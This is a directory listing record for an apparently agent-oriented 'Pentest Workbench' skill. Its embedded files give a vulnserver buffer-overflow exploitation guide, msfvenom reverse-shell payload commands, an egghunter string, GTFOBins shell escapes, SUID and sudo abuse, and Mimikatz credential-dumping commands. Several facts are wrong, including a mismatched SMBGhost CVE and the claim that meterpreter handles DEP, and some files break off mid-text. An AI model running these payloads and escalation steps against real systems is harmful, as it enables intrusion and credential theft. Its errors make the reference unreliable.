pattern):**\n1. Send oversized input to identify crash point\n2. Control EIP with offset measurement\n3. Find stable jump (JMP ESP / call esp)\n4. Generate shellcode (msfvenom / custom)\n5. Execute with proper alignment\n\n**Web:**\n- SQLi → sqlmap or manual union/boolean\n- XSS → Beef/XSS Hunter\n- RCE → reverse shell via pentest-tools\n\n**Privesc (GTFOBins):**\n```\n# Check sudo/suid binaries\nsudo -l\nfind / -perm -4000 2>/dev/null\n\n# Shell escape from restricted editor\n:!/bin/bash\n```\n\n**AD Attacks (Pentest-Tools):**\n- Kerberoasting, AS-REP roasting, SMB relay\n- BloodHound/Sharphound enum → Golden/DFSRM\n\n### Phase 4: Post-Exploitation\n\n- Cowrie honeypot: analyze attacker sessions for TTPs\n- Privilege escalation: kernel exploits, sudo abuse, service misconfigs\n- Persistence: scheduled tasks, services, SSH keys\n- Lateral movement: PsExec, WMI, SMB, Pass-the-Hash\n\n### Phase 5: Documentation\n\n- Steps reproducible by another tester\n- Evidence: screenshots, packet captures, log output\n- Impact: CVSS score, business risk\n- Remediation: specific, actionable fixes\n\n## Key References\n\n- **Binary exploitation**: See `references/buffer-overflow.md` (vulnser"},{"path":"_meta.json","content":"{\n  \"ownerId\": \"kn76xphpfv9rd6m5y7nbv9fttx85a4m6\",\n  \"slug\": \"pentest-workbench\",\n  \"version\": \"1.0.0\",\n  \"publishedAt\": 1776860429875\n}"},{"path":"references/buffer-overflow.md","content":"# Buffer Overflow Exploitation Guide (vulnserver)\n\n## Overview\n\nvulnserver is a Windows TCP server (port 9999) with 14 intentionally vulnerable commands. Each uses `strcpy` into undersized buffers — classic stack overflow training ground.\n\n## Vulnerable Functions\n\n### In vulnserver.c\n\n| Function | Buffer | Command(s) | Offset to EIP |\n|----------|--------|------------|---------------|\n| Function1 | 140 chars | GTER | ~144 |\n| Function2 | 60 chars | KSTET | ~64 |\n| Function3 | 2000 chars | TRUN, GMON, LTER | ~2003 |\n| Function4 | 1000 chars | HTER (hex-encoded) | ~1004 |\n\n### In essfunc.dll\n\n| Function | Buffer Size | Notes |\n|----------|-------------|-------|\n| EssentialFunc10 | 140 | strcpy |\n| EssentialFunc11 | 60 | strcpy |\n| EssentialFunc12 | 2000 | strcpy + printf status |\n| EssentialFunc13 | 2000 | strcpy |\n| EssentialFunc14 | 1000 | strcpy |\n\n## Exploitation Phases\n\n### 1. Fuzzing / Crash Identification\n\nUse a fuzzer or manual send to find the crash point:\n```\npython -c \"print('TRUN ' + 'A'*3000)\" | nc target 9999\n```\n\nWatch for Access Violation (SEH overwrite or EIP control).\n\n### 2. Offset Calculation\n\nGenerate a unique pattern (msf-pattern_create or mona.py):\n```\n!mona pattern_create 3000\n```\nSend pattern, crash, then:\n```\n!mona pattern_offset EIP_value\n```\n\n### 3. Control EIP\n\nConfirm EIP points to `41414141` (AAAA):\n```\nbuffer = \"A\"*N + \"B\"*4 + \"C\"*remaining\n```\nWhere N = offset, B's overwrite EIP.\n\n### 4. Find Jump Point\n\nLocate a `JMP ESP` or `CALL ESP` in memory without ASLR:\n```\n!mona jmp -r esp\n```\nOr use `msf-nasm_shell` to find opcode `FFE4` (JMP ESP).\n\n### 5. Generate Shellcode\n\nBad chars depend on the command. Common problematic chars: `\\x00\\x0a\\x0d\\x25\\x26\\x3b`\n\nGenerate with msfvenom:\n```\nmsfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=443 EXITFUNC=thread -f c -b \"\\x00\\x0a\\x0d\"\n```\n\n### 6. Handle Mitigations\n\n**DEP (Data Execution Prevention):**\n- Use `msfvenom -p windows/meterpreter/reverse_tcp` with `EXITFUNC=thread`\n- Or use ROP chain to mark stack as executable (mona rop)\n\n**ASLR:**\n- Find modules without ASLR (DLLs, exe)\n- Use `!mona opt` to find non-ASLR sections\n\n**SafeSEH:**\n- Use non-SEH protected modules\n\n### 7. Egghunter (Small Buffer)\n\nWhen buffer is too small for full shellcode:\n```\negghunter = \"\\x66\\x8b\\x42\\x3b\\x80\\x74\\x0e\\xff\\xe2\\xeb\\xf9\" + shellcode\n# tag: w00t\n```\n\n### Command-Specific Notes\n\n**TRUN**: Input after `TRUN ` — stops at first `.` in data\n```\nTRUN . + payload\n```\n\n**GMON**: Input after `GMON ` — crashes at `strlen > 3950`\n```\nGMON / + payload (needs / somewhere)\n```\n\n**HTER**: Hex-encoded input. Each 2 bytes of ASCII hex → 1 byte.\n```\nHTER 41424344... (maps to ABCD)\n```\n\n**LTER**: Transforms bytes > 0x7f by subtracting 0x7f. Crashes on `.` delimiter.\n```\nLTER + payload + .\n```\n\n## Mona.py Cheatsheet\n\n```\n!mona pattern_create <length>\n!mona pattern_offset <value>\n!mona findmsp\n!mona jmp -r esp\n!mona rop -m <module.dll>\n!mona emulate\n!mona config -set WorkingFolder C:\\mona\n```\n\n## Checklist Be"},{"path":"references/privesc.md","content":"# Privilege Escalation Reference\n\n## GTFOBins — Unix Binary Abuse\n\nGTFOBins: https://gtfobins.github.io/\n\n### Common GTFOBins Techniques\n\n**vim/vi** — Escape restricted shell:\n```\n:!/bin/bash\n:shell\n```\n\n**awk** — Spawn shell:\n```\nawk 'BEGIN {system(\"/bin/sh\")}'\n```\n\n**find** — Exec from file:\n```\nfind . -exec /bin/sh \\; -quit\n```\n\n**python/perl/ruby/node** — Shell:\n```\npython -c 'import os; os.system(\"/bin/sh\")'\nperl -e 'exec \"/bin/sh\"'\nruby -e 'exec \"/bin/sh\"'\nnode -e 'require(\"child_process\").exec(\"/bin/sh\")'\n```\n\n**less/more** — Via paging:\n```\nless /etc/passwd\n!/bin/sh\n```\n\n**tar** — Via archive:\n```\ntar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n```\n\n**cp** — Overwrite sensitive files:\n```\ncp /bin/sh /tmp/sh && chmod +s /tmp/sh\n```\n\n**perl** — SUID parent:\n```\nperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\n```\n\n## Sudo Abuse Checklist\n\n```bash\nsudo -l\n# Check for NOPASSWD entries\n```\n\n**Known exploitable patterns:**\n```\n(user) NOPASSWD: /usr/bin/find\n(user) NOPASSWD: /usr/bin/vim\n(user) NOPASSWD: /usr/bin/less\n(user) NOPASSWD: /usr/bin/awk\n(user) NOPASSWD: /usr/bin/python\n(user) NOPASSWD: /bin/zip /bin/tar /bin/cp\n```\n\n## SUID Binary Escalation\n\nFind SUID binaries:\n```bash\nfind / -perm -4000 -type f 2>/dev/null\n```\n\n**GTFOBins search**: Filter by Function=Privilege escalation, Context=SUID\n\n**Dangerous patterns:**\n- `nmap` (interactive mode → shell)\n- `vim` (can read/write any file)\n- `less`/`more` (escape to shell)\n- `awk` (system exec)\n- `python`/`perl`/`ruby` (OS-level access)\n\n## Linux Kernel Exploits\n\nCheck kernel version:\n```bash\nuname -a\ncat /etc/issue\n```\n\nKnown exploits (verify before running):\n- `CVE-2022-0847` (DirtyPipe) — Linux 5.8+\n- `CVE-2021-4034` (PwnKit) — polkit < 0.120\n- `CVE-2019-13272` (PTRACE_TRACEME) — <= 5.1.17\n- `CVE-2017-16995` (eBPF) — <= 4.14\n- `dirtycow` (CVE-2016-5195) — older kernels\n\nAlways verify exploit works in non-production test first.\n\n## Windows Privilege Escalation\n\n### Kernel Exploits\n- `MS16-032` — Secondary Logon\n- `CVE-2021-34527` (PrintNightmare) — RCE + privesc\n- `CVE-2022-26919` (SMBGhost) — for older unpatched systems\n\n### Windows Binary Misconfigs\n- `icacls` — Check for weak permissions on system files\n- `sc` — Modify service binary path to hijack\n- `wmic` — Process creation for lateral\n\n### Always-Useful Windows Enums\n```\nwhoami /all\nnet user admin\nnet localgroup administrators\nwmic product get name,version\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\n```\n\n### LOLBAS (Windows Binaries)\nhttps://lolbas-project.github.io/\n\nSimilar concept to GTFOBins but for Windows:\n- `certutil.exe` — Download, decode\n- `mshta.exe` — Execute HTA/VBS\n- `regsvr32.exe` — COM scriptlet execution\n- `wmic.exe` — Process execution\n- `bitsadmin.exe` — File transfer\n\n## Credential Access\n\n**Mimikatz** (Windows):\n```\nprivilege::debug\nsekurlsa::logonpasswords\nsekurlsa::tickets\nkerberos::list\n```\n\n**LaZagne** (Windows + Linux):\n```\npython laZagne.py all\n"},{"path":"references/tools-inventory.md","content":"# Tools Inventory\n\nAll tools catalogued from linked repositories. Organized by category.\n\n## Reconnaissance & OSINT\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `nmap` | Default | Port scanning, service enum, NSE scripts |\n| `masscan` | Default | Fast TCP port scanner |\n| `rustscan` | Default | Modern port scanner (golang) |\n| `Shodan` | Web | Internet-facing device search |\n| `Censys` | Web | Certificate/OSINT search |\n| `theHarvester` | Pentest-Tools | Email/subdomain OSINT |\n| `Amass` | Pentest-Tools | Subdomain enumeration |\n| `ffuf` | Default | Web directory fuzzing |\n| `dirb` | Default | Web directory brute force |\n| `netstalking-osint` | GitHub | Network OSINT automation |\n\n## Web Application Testing\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `Burp Suite` | Default | Web proxy, repeater, intruder |\n| `OWASP ZAP` | Default | Automated scanner |\n| `WPScan` | VulnerableWordpress | WordPress vulnerability scanner |\n| `sqlmap` | Default | SQL injection automation |\n| `Beef` | Default | XSS framework |\n| `XSStrike` | Pentest-Tools | XSS detection |\n| `Commix` | Pentest-Tools | Command injection testing |\n\n## Binary Exploitation\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `msfvenom` | Metasploit | Shellcode generation |\n| `msf-pattern_create` | Metasploit | Offset pattern creation |\n| `mona.py` | Corelan (Immunity) | Exploit dev helper (Win) |\n| `IDA Free` | Hex Rays | Disassembler |\n| `Ghidra` | NSA | Reverse engineering |\n| `pwndbg` | GitHub | GDB plugin for exploit dev |\n| `pwntools` | GitHub | CTF/exploit framework (Python) |\n| `vulnserver` | GitHub | BO training target |\n| `checksec` | GitHub | Binary mitigation checks |\n\n## Buffer Overflow Commands\n\n```bash\n# Pattern generation\nmsf-pattern_create -l 3000\n\n# Shellcode (Windows)\nmsfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f c -b \"\\x00\\x0a\\x0d\"\n\n# Egghunter\nmsfvenom -p windows/egghunter -f raw\n\n# ASMX alphanumeric shellcode\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=443 -f alpha2\n```\n\n## Active Directory\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `BloodHound` | BloodHound | AD relationship graphing |\n| `SharpHound` | BloodHound | Windows collector |\n| `CrackMapExec` | Pentest-Tools | AD enum/attack tool |\n| `Impacket` | GitHub | Python AD attack toolkit |\n| `Mimikatz` | GitHub | Windows credential access |\n| `Rubeus` | GitHub | Kerberos attacks |\n| `PowerSploit` | GitHub | PowerShell AD attacks |\n| `Nishang` | GitHub | PowerShell offensive scripts |\n\n## Post-Exploitation\n\n| Tool | Source | Purpose |\n|------|---------|---------|\n| `PowerSploit` | GitHub | PowerShell privesc/persistence |\n| `Mimikatz` | GitHub | LSASS, ticket extraction |\n| `LaZagne` | GitHub | Browser/credential recovery |\n| `SharpMapExec` | Pentest-Tools | Pass-the-Hash |\n| `Evil-WinRM` | Pentest-Tools | Remote shell via WinRM |\n| `PsExec` | Sysinternals | Remote code exec |\n| `WMIExec` | Impacket | Remote WMI execution |\n| `Cobalt Strik"}],"languages":[],"docsSourceLabel":"CLAWHUB","editorialOverview":"Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Skill: Pentest Workbench Owner: mamuaminu Summary: Comprehensive offensive security workflow for bug bounty, vulnerability assessment, penetration testing, and exploitation. Use when performing security testi... Tags: latest:1.0.0 Version history: v1.0.0 | 2026-04-22T12:20:29.875Z | user Initial release: buffer overflow, privesc, recon, tools catalog Archive index: Archive v1.0.0: 8 files, 11392 bytes Files: referenc","editorialQuality":{"score":100,"threshold":65,"status":"ready","wordCount":1377,"uniquenessScore":60,"reasons":[]}},"media":{"evidence":{"source":"no-media","verified":false,"confidence":"low","updatedAt":"2026-10-09T21:21:22.514Z","emptyReason":"No screenshots, media assets, or demo links are available."},"primaryImageUrl":null,"mediaAssetCount":0,"assets":[],"demoUrl":null},"ownerResources":{"evidence":{"source":"unclaimed","verified":false,"confidence":"low","updatedAt":"2026-10-09T21:21:22.514Z","emptyReason":"This page has not been claimed by the agent owner."},"hasCustomPage":false,"customPageUpdatedAt":null,"customLinks":[],"structuredLinks":{"docsUrl":null,"demoUrl":null,"supportUrl":null,"pricingUrl":null,"statusUrl":null},"customPage":null},"relatedAgents":{"evidence":{"source":"protocol-neighbors","verified":false,"confidence":"medium","updatedAt":"2026-10-10T08:45:34.753Z","emptyReason":null},"items":[{"id":"8ebccd8e-3863-4187-8355-c3f14e1f9edf","entityType":"agent","canonicalPath":"/agent/iofficeai-aionui","slug":"iofficeai-aionui","name":"AionUi","description":"Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | 🌟 Star if you like it!","url":"https://github.com/iOfficeAI/AionUi","homepage":"https://www.aionui.com","source":"GITHUB_REPOS","protocols":["MCP","OPENCLAW"],"capabilities":[],"safetyScore":100,"overallRank":70,"updatedAt":"2026-10-09T19:11:12.944Z","createdAt":"2026-02-25T03:38:16.584Z","downloads":null},{"id":"b917f68a-ebff-438e-84f8-3f4b2494c0bc","entityType":"agent","canonicalPath":"/agent/activepieces-activepieces","slug":"activepieces-activepieces","name":"activepieces","description":"AI Agents & MCPs & AI Workflow Automation • (~400 MCP servers for AI agents) • AI Automation / AI Agent with MCPs • AI Workflows & AI Agents • MCPs for AI Agents","url":"https://github.com/activepieces/activepieces","homepage":"https://www.activepieces.com","source":"GITHUB_REPOS","protocols":["OPENCLAW"],"capabilities":[],"safetyScore":100,"overallRank":70,"updatedAt":"2026-04-15T02:22:12.426Z","createdAt":"2026-02-25T03:38:12.412Z","downloads":null},{"id":"5cb26759-3a39-483f-94cf-276a98c13bb8","entityType":"agent","canonicalPath":"/agent/cherryhq-cherry-studio","slug":"cherryhq-cherry-studio","name":"cherry-studio","description":"AI productivity studio with smart chat, autonomous agents, and 300+ assistants. Unified access to frontier LLMs","url":"https://github.com/CherryHQ/cherry-studio","homepage":"https://cherry-ai.com","source":"GITHUB_REPOS","protocols":["MCP","OPENCLAW"],"capabilities":[],"safetyScore":100,"overallRank":70,"updatedAt":"2026-04-11T14:38:40.986Z","createdAt":"2026-02-25T03:38:19.379Z","downloads":null},{"id":"6f6582d0-5d76-4f0f-b81d-86520247950b","entityType":"agent","canonicalPath":"/agent/copilotkit-copilotkit","slug":"copilotkit-copilotkit","name":"CopilotKit","description":"The Frontend for Agents & Generative UI. React + Angular","url":"https://github.com/CopilotKit/CopilotKit","homepage":"https://docs.copilotkit.ai","source":"GITHUB_REPOS","protocols":["OPENCLAW"],"capabilities":[],"safetyScore":100,"overallRank":70,"updatedAt":"2026-03-25T09:50:57.846Z","createdAt":"2026-02-25T03:39:14.617Z","downloads":null}],"links":{"hub":"/agent","source":"/agent/source/clawhub","protocols":[{"label":"OpenClaw","href":"/agent/protocol/openclew"}]}}}